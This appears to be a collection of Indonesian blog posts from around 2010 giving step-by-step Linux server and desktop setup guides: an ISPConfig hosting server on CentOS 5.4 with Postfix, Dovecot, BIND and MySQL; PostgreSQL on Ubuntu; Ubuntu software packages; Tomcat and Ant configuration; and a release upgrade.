- OS : OS Centos 5.4 (disini tidak dibahas mengenai instalasi OS. Instalasi OS yg dibutuhkan standard package no GUI)
- Web Server: Apache/2.2.3 with PHP 5.1.6
- Web statistik : Webalizer V2.01-10
- Database Server: MySQL 5.0.77
- Mail Server: Postfix
- DNS Server: BIND9 (chrooted)
- FTP Server: Proftpd v1.3.2c
- POP3/IMAP server: Dovecot 1.0.7

# lspci | grep Ethernet

# tar zxvf l2-linux-v1.0.40.4.tar.gz
# cd l2-linux-v1.0.40.4/src
# make && make install

# vi /etc/hosts

# vi /etc/resolv.conf

# vi /etc/sysconfig/network

# vi /etc/sysconfig/network-scripts/ifcfg-eth0

# /etc/init.d/network restart

# ifconfig

Instalasi paket yang dibutuhkan :
Remove paket yang tidak diinginkan (opsional) :

# yum remove vsftpd NetworkManager irda isdn pcscd

Setting repository ke lokal repo kambing.ui.ac.id (opsional bergantung repo yang biasa anda pakai) :
# mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.asli
# vim /etc/yum.repos.d/kambing.repo

# Repository dari server kambing.ui.ac.id
[kambing-base]
name=CentOS.kambing-$releasever – Base
baseurl=http://kambing.ui.ac.id/centos/$releasever/os/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-updates]
name=CentOS.kambing-$releasever – Updates
baseurl=http://kambing.ui.ac.id/centos/$releasever/updates/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-addons]
name=CentOS.kambing-$releasever – Addons
baseurl=http://kambing.ui.ac.id/centos/$releasever/addons/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-extras]
name=CentOS.kambing-$releasever – Extras
baseurl=http://kambing.ui.ac.id/centos/$releasever/extras/$basearch/
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-centosplus]
name=CentOS.kambing-$releasever – Centosplus
baseurl=http://kambing.ui.ac.id/centos/$releasever/centosplus/$basearch/
enable=1
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-contrib]
name=CentOS.kambing-$releasever – Contrib
baseurl=http://kambing.ui.ac.id/centos/$releasever/contrib/$basearch/
enable=1
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

[kambing-fasttrack]
name=CentOS.kambing-$releasever – Fasttrack
baseurl=http://kambing.ui.ac.id/centos/$releasever/fasttrack/$basearch/
enable=1
gpgkey=http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5

import GPG key untuk authentikasi :
# rpm –import http://kambing.ui.ac.id/centos/RPM-GPG-KEY-CentOS-5
# yum clean all
# yum makecache
# yum update
# reboot
# uname -a

Linux jempol 2.6.18-164.11.1.el5.centos.plusxen #1 SMP Wed Jan 20 20:14:28 EST 2010 i686 i686 i386 GNU/Linux

Install paket yang diperlukan :

# yum install fetchmail wget bzip2 unzip zip nmap openssl lynx fileutils gcc \
gcc-c++ quota bind bind-chroot mysql mysql-devel mysql-server cyrus-sasl cyrus-sasl-devel \
cyrus-sasl-gssapi cyrus-sasl-md5 cyrus-sasl-plain postfix dovecot php php-devel php-gd php-imap \
php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc curl curl-devel perl-libwww-perl ImageMagick \
libxml2 libxml2-devel httpd-devel ruby ruby-devel mod_python perl-HTML-Parser perl-DBI perl-Net-DNS \
perl-Digest-SHA1 webalizer ntp

Setting quota :
tambahkan usrquota,grpquota dibelakang defaults pada root :
# vi /etc/fstab
/dev/VolGroup00/LogVol00 / ext3 defaults,usrquota,grpquota 1 1
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/VolGroup00/LogVol01 swap swap defaults 0 0

# touch /aquota.user /aquota.group
# chmod 600 /aquota.*
# mount -o remount /
# quotacheck -avugm
# quotaon -avug

Setting Chrooted DNS Server (BIND9) :
# chmod 755 /var/named/
# chmod 775 /var/named/chroot/
# chmod 775 /var/named/chroot/var/
# chmod 775 /var/named/chroot/var/named/
# chmod 775 /var/named/chroot/var/run/
# chmod 777 /var/named/chroot/var/run/named/
# cd /var/named/chroot/var/named/
# ln -s ../../ chroot
# cp /usr/share/doc/bind-9.3.6/sample/var/named/named.local /var/named/chroot/var/named/named.local
# cp /usr/share/doc/bind-9.3.6/sample/var/named/named.root /var/named/chroot/var/named/named.root
# touch /var/named/chroot/etc/named.conf
# chkconfig –levels 235 named on
# /etc/init.d/named start

Setting MySQL Server :
# vi /etc/my.cnf
Hapus tanda # pada bagian skip-networking
# chkconfig –levels 235 mysqld on
# /etc/init.d/mysqld start
# mysqladmin -u root password rootpasswordmysql
# mysqladmin -h jempol.wedus.us -u root password rootpasswordmysql

Setting SMTP-AUTH dan TLS pada Postfix :
# postconf -e ’smtpd_sasl_local_domain =’
# postconf -e ’smtpd_sasl_auth_enable = yes’
# postconf -e ’smtpd_sasl_security_options = noanonymous’
# postconf -e ‘broken_sasl_auth_clients = yes’
# postconf -e ’smtpd_sasl_authenticated_header = yes’
# postconf -e ’smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination’
# postconf -e ‘inet_interfaces = all’
# postconf -e ‘mynetworks = 127.0.0.0/8′
Aktifkan PLAIN dan LOGIN untuk login dengan melakukan editing file :
# vi /usr/lib/sasl2/smtpd.conf

pwcheck_method: saslauthd
mech_list: plain login

Notes : untuk CentOS 64 bit letak file smtpd.conf di /usr/lib64/sasl2/smtpd.conf

Certificate untuk TLS :

# mkdir /etc/postfix/ssl
# cd /etc/postfix/ssl/
# openssl genrsa -des3 -rand /etc/hosts -out smtpd.key 1024

# chmod 600 smtpd.key
# openssl req -new -key smtpd.key -out smtpd.csr

# openssl x509 -req -days 3650 -in smtpd.csr -signkey smtpd.key -out smtpd.crt

# openssl rsa -in smtpd.key -out smtpd.key.unencrypted

# mv -f smtpd.key.unencrypted smtpd.key
# openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650

Configure Postfix for TLS:

# postconf -e ’smtpd_tls_auth_only = no’
# postconf -e ’smtp_use_tls = yes’
# postconf -e ’smtpd_use_tls = yes’
# postconf -e ’smtp_tls_note_starttls_offer = yes’
# postconf -e ’smtpd_tls_key_file = /etc/postfix/ssl/smtpd.key’
# postconf -e ’smtpd_tls_cert_file = /etc/postfix/ssl/smtpd.crt’
# postconf -e ’smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem’
# postconf -e ’smtpd_tls_loglevel = 1′
# postconf -e ’smtpd_tls_received_header = yes’
# postconf -e ’smtpd_tls_session_cache_timeout = 3600s’
# postconf -e ‘tls_random_source = dev:/dev/urandom’

Set hostname untuk Postfix :
postconf -e ‘myhostname = jempol.wedus.us’
Konfigurasi Postfix selesai, silahkan cek hasil konfigurasinya :
# cat /etc/postfix/main.cf (comments sudah dihilangkan)

queue_directory = /var/spool/postfix
command_directory = /usr/sbin
daemon_directory = /usr/libexec/postfix
mail_owner = postfix
inet_interfaces = all
mydestination = $myhostname, localhost.$mydomain, localhost
unknown_local_recipient_reject_code = 550
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
debug_peer_level = 2
debugger_command =
PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin
xxgdb $daemon_directory/$process_name $process_id & sleep 5

sendmail_path = /usr/sbin/sendmail.postfix
newaliases_path = /usr/bin/newaliases.postfix
mailq_path = /usr/bin/mailq.postfix
setgid_group = postdrop
html_directory = no
manpage_directory = /usr/share/man
sample_directory = /usr/share/doc/postfix-2.3.3/samples
readme_directory = /usr/share/doc/postfix-2.3.3/README_FILES
smtpd_sasl_local_domain =
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
broken_sasl_auth_clients = yes
smtpd_sasl_authenticated_header = yes
smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination
mynetworks = 127.0.0.0/8
smtpd_tls_auth_only = no
smtp_use_tls = yes
smtpd_use_tls = yes
smtp_tls_note_starttls_offer = yes
smtpd_tls_key_file = /etc/postfix/ssl/smtpd.key
smtpd_tls_cert_file = /etc/postfix/ssl/smtpd.crt
smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem
smtpd_tls_loglevel = 1
smtpd_tls_received_header = yes
smtpd_tls_session_cache_timeout = 3600s
tls_random_source = dev:/dev/urandom
myhostname = jempol.wedus.us

Aktivasi protokol imap, imaps, pop3, dan pop3s pada Dovecot :
# vi /etc/dovecot.conf

# Protocols we want to be serving: imap imaps pop3 pop3s
# If you only want to use dovecot-auth, you can set this to “none”.
protocols = imap imaps pop3 pop3s

Start on boot Postfix, saslauthd, Dovecot dan disable sendmail :

# chkconfig –levels 235 sendmail off
# chkconfig –levels 235 postfix on
# chkconfig –levels 235 saslauthd on
# chkconfig –levels 235 dovecot on
# /etc/init.d/sendmail stop
# /etc/init.d/postfix start
# /etc/init.d/saslauthd start
# /etc/init.d/dovecot start

##############
To see if SMTP-AUTH and TLS work properly now run the following command:

telnet localhost 25

After you have established the connection to your Postfix mail server type

ehlo localhost

If you see the lines

250-STARTTLS

and

250-AUTH LOGIN PLAIN

everything is fine.

[root@server1 ssl]# telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.localdomain (127.0.0.1).
Escape character is ‘^]’.
220 server1.example.com ESMTP Postfix
ehlo localhost
250-server1.example.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
quit
221 2.0.0 Bye
Connection closed by foreign host.
[root@server1 ssl]#

Type

quit

Setting Maildir Dovecot
Format Dovecot tidak menggunakan mbox tetapi menggunakan Maildir, aktifkan Maildir ini dari menu ISPConfig di Management -> Server -> Settings -> Email.

postconf -e ‘home_mailbox = Maildir/’
postconf -e ‘mailbox_command =’
/etc/init.d/postfix restart

Setting Apache Webserver :
# vi /etc/httpd/conf/httpd.conf

DirectoryIndex index.html index.htm index.shtml index.cgi index.php index.php3 index.pl

Instalasi ISPCpnfig :
Download ISPConfig2 terlebih dahulu di sini
# tar zxvf ISPConfig.tar.gz
# cd ISPConfig
# ./setup

CentOS 5.4
Neuinstallation eines ISPConfig-Systems. / Installation of a new ISPConfig system. / Installation d’ISPConfig sur un nouveau syst�me.
W�hlen Sie Ihre Sprache (deutsch/englisch/spanisch/franz�sisch/italienisch/niederl�ndisch/polnisch/schwedisch): / Please choose your language (German/English/Spanish/French/Italian/Dutch/Polish/Swedish): / Merci de choisir votre langue (Allemand/Anglais/Espagnol/Fran�ais/Italien/N�erlandais/Polonais/Su�dois):
1) de
2) en
3) es
4) fr
5) it
6) nl
7) pl
se
Ihre Wahl: / Your Choice: / Votre Choix:2
With the system installation, some system files are replaced where adjustments were made. This can lead to loss of entries in httpd.conf, named.conf as well as in the Sendmail configuration.

Do you want to continue with the installation? [y/n]y
Please read through the licence carefully:

Copyright (c) 2005, projektfarm GmbH, Till Brehm, Falko Timme
All rights reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of ISPConfig nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Do you accept the licence? [y/n]y

Please select the installation mode. In expert mode you have to answer some additional questions. In standard mode standard values are assumed for these questions.
1) standard
2) expert
Your Choice: 1

########## MAIL SERVER ##########

Checking for MTA…
/usr/sbin/postfix
OK

ISPConfig found the following MTA:
postfix
Is this correct? [y/n]y

########## FTP SERVER ##########

Checking if an FTP server is installed…
/usr/sbin/proftpd
OK

ISPConfig found the following FTP server:
proftpd
Is this correct? [y/n]y

########## PROCMAIL ##########

Checking for package procmail…
/usr/bin/procmail
OK

########## QUOTA ##########

Checking for package quota…
/usr/bin/quota
OK

########## MYSQL SERVER ##########

Checking for package MySQL…
/usr/bin/mysql
OK

########## OPENSSL ##########

Checking for package openssl…
/usr/bin/openssl
OK

########## DNS SERVER ##########

Checking for package bind…
/usr/sbin/named
OK

########## IPTABLES/IPCHAINS/IPFW ##########

Checking for program iptables/ipchains/ipfw…
/sbin/iptables
OK

########## WEB SERVER ##########

Checking for program httpd…
/usr/sbin/httpd
OK
Checking the syntax of the httpd.conf…
Syntax OK
The syntax is ok!

########## gcc ##########

/usr/bin/gcc
OK

########## make ##########

/usr/bin/make
OK

########## lex ##########

/usr/bin/lex
OK

########## g++ ##########

/usr/bin/g++
OK

########## INSTALLATION ##########

proses instalasi……….
————
Generating custom certificate signed by own CA [CUSTOM]
______________________________________________________________________

STEP 0: Decide the signature algorithm used for certificates
The generated X.509 certificates can contain either
RSA or DSA based ingredients. Select the one you want to use.
Signature Algorithm ((R)SA or (D)SA) [R]:R
______________________________________________________________________

STEP 1: Generating RSA private key for CA (1024 bit) [ca.key]
178805 semi-random bytes loaded
Generating RSA private key, 1024 bit long modulus
………………….++++++
………………….++++++
e is 65537 (0×10001)
______________________________________________________________________

STEP 2: Generating X.509 certificate signing request for CA [ca.csr]
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
1. Country Name (2 letter code) [XY]:ID
2. State or Province Name (full name) [Snake Desert]:East Java
3. Locality Name (eg, city) [Snake Town]:Malang
4. Organization Name (eg, company) [Snake Oil, Ltd]:PT. Wedus Gembel
5. Organizational Unit Name (eg, section) [Certificate Authority]:Wedus Team
6. Common Name (eg, CA name) [Snake Oil CA]:Wedus CA
7. Email Address (eg, name@FQDN) [ca@snakeoil.dom]:ca@wedus.us
8. Certificate Validity (days) [365]:365
______________________________________________________________________

STEP 3: Generating X.509 certificate for CA signed by itself [ca.crt]
Certificate Version (1 or 3) [3]:3
Signature ok
subject=/C=ID/ST=East Java/L=Malang/O=PT. Wedus Gembel/OU=Wedus Team/CN=Wedus CA/emailAddress=ca@wedus.us
Getting Private key
Verify: matching certificate & key modulus
Verify: matching certificate signature
../conf/ssl.crt/ca.crt: /C=ID/ST=East Java/L=Malang/O=PT. Wedus Gembel/OU=Wedus Team/CN=Wedus CA/emailAddress=ca@wedus.us
error 18 at 0 depth lookup:self signed certificate
OK
______________________________________________________________________

STEP 4: Generating RSA private key for SERVER (1024 bit) [server.key]
178947 semi-random bytes loaded
Generating RSA private key, 1024 bit long modulus
………++++++
……………++++++
e is 65537 (0×10001)
______________________________________________________________________

STEP 5: Generating X.509 certificate signing request for SERVER [server.csr]
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter ‘.’, the field will be left blank.
—–
1. Country Name (2 letter code) [XY]:ID
2. State or Province Name (full name) [Snake Desert]:East Java
3. Locality Name (eg, city) [Snake Town]:Malang
4. Organization Name (eg, company) [Snake Oil, Ltd]:PT. Wedus Gembel
5. Organizational Unit Name (eg, section) [Webserver Team]:Wedus Team
6. Common Name (eg, FQDN) [www.snakeoil.dom]:www.wedus.us
7. Email Address (eg, name@fqdn) [www@snakeoil.dom]:info@wedus.us
8. Certificate Validity (days) [365]:365
______________________________________________________________________

STEP 6: Generating X.509 certificate signed by own CA [server.crt]
Certificate Version (1 or 3) [3]:3
Signature ok
subject=/C=ID/ST=East Java/L=Malang/O=PT. Wedus Gembel/OU=Wedus Team/CN=www.wedus.us/emailAddress=info@wedus.us
Getting CA Private Key
Verify: matching certificate & key modulus
Verify: matching certificate signature
../conf/ssl.crt/server.crt: OK
______________________________________________________________________

STEP 7: Enrypting RSA private key of CA with a pass phrase for security [ca.key]
The contents of the ca.key file (the generated private key) has to be
kept secret. So we strongly recommend you to encrypt the server.key file
with a Triple-DES cipher and a Pass Phrase.
Encrypt the private key now? [Y/n]: y
writing RSA key
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:
Fine, you’re using an encrypted private key.
_______________________________________________________________________

STEP 8: Enrypting RSA private key of SERVER with a pass phrase for security [server.key]
The contents of the server.key file (the generated private key) has to be
kept secret. So we strongly recommend you to encrypt the server.key file
with a Triple-DES cipher and a Pass Phrase.
Encrypt the private key now? [Y/n]: y
writing RSA key
Enter PEM pass phrase:
Verifying – Enter PEM pass phrase:

————
Connected successfully to MySQL server
no crontab for root
Restarting some services…
Shutting down postfix: [ OK ]
Starting postfix: [ OK ]
Shutting down proftpd: [ OK ]
Starting proftpd: [ OK ]
Starting ISPConfig system…
Apache/1.3.41 mod_ssl/2.8.31 (Pass Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server jempol.wedus.us:81 (RSA)
Enter pass phrase:

Ok: Pass Phrase Dialog successful.
/root/ispconfig/httpd/bin/apachectl startssl: httpd started
ISPConfig system is now up and running!
Congratulations! Your ISPConfig system is now installed. If you had to install quota, please take the steps described in the installation manual. Otherwise your system is now available without reboot.
Please direct your browser to

https://jempol.wedus.us:81

and log in:
Username: admin
Password: admin

[root@jempol install_ispconfig]#

Reference : http://www.howtoforge.org

Untuk menginstall Database PostgreSQL di Ubuntu OS tidaklah sulit, apalagi ubuntu udah menyediakan package-packagenya. Mungkin yang perlu diperhatikan hanyalah langkah-langkahnya, berikut adalah langkah-langkah menginstall Databas PostgreSQL:

Langkah pertama adalah menginstall PostgreSQL Server disini saya menggunakan PostgreSQL Server 8.4, untuk mendapatkan packagenya bisa menggunakan Synaptic Package Manager

→ Quick Search with key “postgresql”

maka akan muncul nama-nama package yang tersedia di ubuntu

→ postgresql-server-dev-8.4

pilih mark for installation lalu Applay maka secara otomatis proses installasi akan berjalan dengan sendirinya.

Langkah berikutnya adalah install PostgreSQL Client, PostgreSQL Contrib & Install PgAdmin3, pada intalasi berikut bisa dilakukan melalui Synaptic atau langsung melalui command seperti berikut:

→ $ sudo apt-get install postgresql postgresql-client postgresql-contrib

→ $ sudo apt-get install pgadmin3

ket: Baris pertama untuk menginstall paket postgresql dan paket-paket yang lain yang dibutuhkan, sedangkan dibaris berikutnya menginstall pgadmin yaitu Graphical User Interface untuk PostgreSQL Admin.

Setelah proses instalasi berhasil, yang perlu diperhatikan adalah melakukan reset password postgres (account administrator). Ketik perintah berikut dalam command:

→ $ sudo su postgres -c psql

→ postgres=# ALTER USER postgres WITH PASSWORD ‘passwordku’;

→ postgres=# \q

perintah tersebut akan merubah password postgres menjadi passwordku, dan sekarang waktunya menyamakan password unix untuk user postgres.

→ $ sudo passwd -d postgres

→ $ sudo su postgres -c passwd

masukkan password yang sama dengan tadi, dalam hal ini passwordku(minimal 6 Digit). Setelah itu agar pgAdmin bisa masuk ke database server menggunakan user postgres, kita harus men set-up PostgreSQL admin pack. caranya jalankan perintah berikut dalam command line

→$ sudo su postgres -c psql < /usr/share/postgresql/8.4/contrib/adminpack.sql

Kemudia atur konfigurasi postgresql.conf

→ $ sudo gedit /etc/postgresql/8.4/main/postgresql.conf

ganti baris berikut:

#listen_addresses = ‘localhost’

menjadi

listen_addresses = ‘*’

dan juga baris :

#password_encryption = on

menjadi

password_encryption = on

Simpan dan tutup gedit.

Langkah terakhir adalah menentukan siapa saja yang berhak masuk ke dalam server dengan mengedit file pg_hba.con

$ sudo gedit /etc/postgresql/8.4/main/pg_hba.conf

pastikan isi file seperti berikut

# DO NOT DISABLE!

# If you change this first entry you will need to make sure that the

# database

# super user can access the database using some other method.

# Noninteractive

# access to all databases is required during automatic maintenance

# (autovacuum, daily cronjob, replication, and similar tasks).

#

# Database administrative login by UNIX sockets

local all postgres ident sameuser

# TYPE DATABASE USER CIDR-ADDRESS METHOD

# “local” is for Unix domain socket connections only

local all all md5

# IPv4 local connections:

host all all 127.0.0.1/32 md5

# IPv6 local connections:

host all all ::1/128 md5

# Connections for all PCs on the subnet

#

# TYPE DATABASE USER IP-ADDRESS IP-MASK METHOD

host all all [ip address] [subnet mask] md5

Ganti [ip address] denga alamat ip dari komputer yang diperbolehkan masuk ke dalam server database, seperti 192.168.1.5 dan [subnet mask] dengan subnet jaringan kita. Jika ingin yang terkoneksi dari semua ip yang ada dalam subnet, anda bisa memberi ip address dengan subnet address seperti 192.168.1.0 maka semua ip 192.168.1.x

dan langkah yang terakhir adalah merestart Server PostgreSQL dengan perintah:

→ $ sudo /etc/init.d/postgresql-8.4 restart

Selesai sudah, Semoga bermanfaat.

 $ sudo aptitude install sudo aptitude install ubuntu-restricted-extras build-essential gwget xchat python-glade2 usb-imagewriter pidgin mozilla-thunderbird filezilla wine youtube-dl httrack webhttrack xchm

2. Software Packager

 $ sudo aptitude install unace rar unrar zip unzip p7zip-full p7zip-rar sharutils aish uudeview mpack lha arj cabextract file-roller

3. More fonts

 $ sudo aptitude install msttcorefonts ttf-larabie-straight ttf-larabie-deco xfonts-terminus-dos xfonts-terminus xfonts-terminus-oblique xfonts-mona ttf-farsiweb ttf-opensymbol ttf-freefont ttf-dustin ttf-devanagari-fonts ttf-dejavu-extra ttf-dejavu-core ttf-dejavu ttf-bpg-georgian-fonts ttf-alee

4. Multimedia

 $ sudo aptitude install vlc audacious mpeg2dec a52dec mpg321 mpg123 libswfdec0.3 libflac++6 ffmpeg cdda2wav libmp4v2-0 libmjpegtools0c2a tagtool easytag id3tool lame lame-extras nautilus-script-audio-convert libmad0 libjpeg-progs libmpcdec3 libquicktime1 flac faac faad sox toolame a52dec ffmpeg2theora libmpeg2-4 uudeview flac libmpeg3-1 mpeg3-utils mpegdemux imagemagick

Tips pake image magick sekali tebang bisa edit banyak foto :
resize by lebar photo :

 $ for k in $(ls *.JPG); do convert $k -resize 1024 -quality 90 $k; done

kalo resize by tinggi photo :

 $ for k in $(ls *.JPG); do convert $k -resize x768 -quality 90 $k; done

dah… tips ini berguna waktu edit foto2 lawas yang udah bergiga2 di HD Ext, so sekali jalan.. wuss…. bisa hemat space smp 2gb. Mayan tooohh….

5. Flash

 $ sudo aptitude install gsfonts gsfonts-x11 flashplugin-nonfree

6. Java

 $ sudo aptitude install sun-java6-bin sun-java6-fonts sun-java6-jdk sun-java6-plugin

 $ sudo update-alternatives --config java

7. IDE for Java and Python

 $ sudo aptitude install netbeans eclipse spe vim

8. Virtual Box
Apabila ingin menambah package virtual box, tambahkan repository di /etc/apt/source.list (kebetulan saya menggunakan ubuntu karmic koala, apabila anda menggunakan versi lain silahkan disesuaikan) :

# Virtual Box
deb http://www.virtualbox.org/debian karmic non-free

Kemudian masukkan public key dari domain tersebut :

 $ wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -

Update source list :

 $ sudo aptitude update

Install Virtual Box :

 $ sudo aptitude install virtualbox-3.0 dkms bridge-utils

Note : setting virtual network vbox di ubuntu supaya bisa konek ke network lokal maupun internet disarankan menggunakan adapter type : Intel PRO 1000 MT (Desktop) dan attached to : NAT

9. Google Chrome / Chromium – web browser
Tambahkan list repository di /etc/apt/source.list dengan :

deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main

Tambahkan GPG key :

 $ sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 0xfbef0d696de1c72ba5a835fe5a9bf3bb4e5e17b5

Update source list :

 $ sudo aptitude update

Install google chrome :

 $ sudo aptitude install chromium-browser

10. Open Project – Project Management Tools
Download open project dari sourceforge di :

 http://sourceforge.net/projects/openproj/files/OpenProj%20Binaries/1.4/openproj_1.4-2.deb/download

Abis itu?? ya langsung double click aja… nda usah pake console2an
11. Penetration testing, incident response, and computer forensics

 $ sudo aptitude install kismet aircrack-ng wireshark nmap dsniff autopsy nikto ophcrack aterm nessusd nessus nessus-plugins

Package aterm (xterm emulator) dibuat supaya aplikasi-aplikasi berbasis cli (command line interface) dapat dibuat executable dari pulldown menu ubuntu.
Buat satu file /usr/bin/spy-term :

 $ sudo vim /usr/bin/spy-term

Masukkan baris berikut :

#!/bin/sh
/usr/bin/aterm -tint yellow -tr -trsb -sh 10 -cr green +sb -sl 1000 -title "Autopsy Shell" -fg White -e /usr/bin/autopsy

Setelah filenya disimpan, buat file tersebut executable :

 $ sudo chmod +x /usr/bin/psy-term

Buat satu menu tersendiri dari menu System -> Preferences -> Main Menu, dan buatlah shortcut menu dengan memilih Application dan memanggil /usr/bin/psy-term. Selamat mencoba dan berkreasi…
Apabila ingin menambah dengan metasploit, silahkan dilihat disini
Untuk instalasi Apache web server beserta databasenya (MySQL) juga sudah pernah saya tulis, silahkan dilihat disini
Ada yang ingin menambahkan??

Update 19 Februari 2010 :
Beberapa waktu yang lalu ada pertanyaan dari teman, gimana supaya linux (baca: ubuntu) bisa disandingkan dengan media center-nya microsoft. It’s easy step i guess :

  $ sudo add-apt-repository ppa:team-xbmc
  $ sudo apt-get update
  $ sudo apt-get install xbmc xbmc-standalone
  $ sudo apt-get update

Apabila muncul error “E: Broken package” pada saat instalasi, aktifkan menu “Community-maintained open Source software (universe)” dan “Software restricted by copyright or legal issues (multiverse)” dari menu System –> Administration –> Software Sources.
Nah silahkan direview hasilnya karena saya sendiri belum kelar coba-coba xbmc tersebut.. cayoo

b. Sun Java (JDK)
- Install paket instalasi java JDK:
$ sudo aptitude install sun-java6-jdk
- Set Sun Java JDK sebagai default JDK:
$ sudo update-java-alternatives -s java-6-sun
- Buat variable JAVA_HOME:
$ sudo echo ‘JAVA_HOME=”/usr/lib/jvm/java-6-sun”‘ | sudo tee -a /etc/environment
- Supaya variabel ini bisa langsung digunakan tulis :
$ source /etc/environment

c. Apache-tomcat
- Install paket apache tomcat :
$ sudo aptitude install tomcat6 tomcat6-admin
- Cek port running tomcat. Apabila apache webserver sudah terinstall di port 80, biasanya tomcat akan running di port 8080, untuk memastikan dari firefox, buka http://localhost:8080 atau menggunakan tools nmap :
$ sudo nmap -v -sS -A localhost
- Set variabel CATALINA_HOME dan CATALINA_BASE :
$ sudo echo ‘CATALINA_HOME=”/usr/share/tomcat6″‘ | sudo tee -a /etc/environment
$ sudo echo ‘CATALINA_BASE=”/var/lib/tomcat6″‘ | sudo tee -a /etc/environment
- Edit file /etc/default/tomcat6, dan tambahkan baris dibawah :
JAVA_OPTS=”-Djava.awt.headless=true -Xms384M -Xmx512M -XX:MaxPermSize=256M”
- Kopi tools.jar dari java class path :
$ sudo cp $JAVA_HOME/lib/tools.jar /var/lib/tomcat6/lib/
- Buat user manager dan account manager tomcat di /etc/tomcat6/tomcat-users.xml :

d. Apache Ant
- Install Apache Ant :
$ sudo aptitude install ant ant-optional
- Set home variable apache ant :
$ sudo echo ‘ANT_HOME=”/usr/share/ant”‘ | sudo tee -a /etc/environment
- Set variable ant_opts (32bit):
$ sudo echo ‘ANT_OPTS=”-Xmx1024M”‘ | sudo tee -a /etc/environment
- Apabila menggunakan 64bits bisa menggunakan perintah ini :
$ sudo echo ‘ANT_OPTS=”-Xmx1024M -XX:MaxPermSize=128M”‘ | sudo tee -a /etc/environment
—- Sebenarnya dah selesai tinggal install openbravo-nya, tapi lagi males banget untuk nulis.. hehehe…
ntar aja update lagi deh…..

$ update-manager -d

Sampai muncul gambar seperti dibawah ini :

Nah tuh kan.. muncul New distribution release ‘9.04′ is avaliable. Tekan Upgrade dan ikuti wizard instalasinya sampai selesai.
Cara yang lain dengan melakukan editing file sources.list di /etc/apt. Dengan menggunakan editor, ganti kata “intrepid” dengan “jaunty”, kemudian simpan, dan jalankan perintah berikut :

$ sudo aptitude update && sudo aptitude full-upgrade && sudo aptitude purge

Tinggal nunggu proses selesai aja.
Kalo instalasi udah selesai, bisa kita liat release ubuntu kita yang baru :

$ sudo lsb_release -a

Distributor ID:	Ubuntu
Description:	Ubuntu 9.04
Release:	9.04
Codename:	jaunty

Cayooo.. ayo dites menu-menunya nyookk…. sambil nunggu event JRE… sapa tau dapat door prizenya

Repositori Kambing (UI — Telkom, Indosat, OpenIXP, INHERENT)
Informasi situs: http://kambing.ui.edu

### sources.list.kambing
### Repository dengan menggunakan server mirror kambing.ui.edu
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://kambing.ui.edu/ubuntu gutsy main restricted universe multiverse
